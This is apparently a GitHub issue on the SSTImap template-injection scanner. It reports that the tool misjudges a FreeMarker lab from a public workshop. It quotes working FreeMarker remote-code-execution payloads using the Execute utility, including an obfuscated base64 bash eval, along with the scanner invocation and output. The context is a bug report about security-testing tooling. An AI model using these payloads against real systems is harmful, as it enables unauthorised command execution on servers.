Skip to content

SSTImap should test simple payload, otherwise may return false positive result #30

New issue
New issue
Open
Open
SSTImap should test simple payload, otherwise may return false positive result#30
Labels
awaits confirmationThe issue is supposed to be resolved, but requires some testingdelayedThe issue will be fixed with a big update later
@alasalamont

Description

@alasalamont
alasalamont
opened on Dec 26, 2023

Hi brother,
I did test SSTImap on this workshop, at 25_template_freemarker

https://gosecure.github.io/template-injection-workshop/

When I use simple payload, it works

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")}

But when the tool use its payload, it does not work

${7670795914?c}<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<ZWNobyBhMA==|{base64,--decode})}") }${7841412055?c}

The site returns

Template blocked: Cannot run program "bash": error=2, No such file or directory ---- FTL stack trace ("~" means nesting-related): - Failed at: ${ex("bash -c {eval,$({tr,/+,_-}\l\l\... [in template "tpl" at line 1, column 72] ----

Because of this, the tool also return false positive result

┌──(root㉿kali)-[/home/kali/Desktop/SSTImap]
└─# python3 sstimap.py -u "http://localhost:8025/admin/edit_page/1" -d "_csrf=ddcf50d0-b5a0-43f5-95dd-351495abc31b&title=Welcome+Page&templateCode=*&action=test" -C "JSESSIONID=182F5156C0D7E1B0A0E72D87D3D4F845" --proxy http://localhost:8080 -l 5 -e Freemarker

                                                          
[*] Version: 1.1.4
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; legacy_engines: 1; engines: 16

[*] Scanning url: http://localhost:8025/admin/edit_page/1
[*] Testing if POST parameter 'templateCode' is injectable
[*] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin has confirmed injection with tag '*'
[+] SSTImap identified the following injection point:

  POST parameter: templateCode
  Engine: Freemarker
  Injection: *
  Context: text
  OS: undetected
  Technique: render
  Capabilities:

    Shell command execution: no
    Bind and reverse shell: no
    File write: no
    File read: no
    Code evaluation: no

[+] Rerun SSTImap providing one of the following options:
    --tpl-shell                  Prompt for an interactive shell on the template engine.
    --tpl-cmd                    Inject code in the template engine.

Metadata

Metadata

Assignees

No one assigned

    Labels

    awaits confirmationThe issue is supposed to be resolved, but requires some testingdelayedThe issue will be fixed with a big update later

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions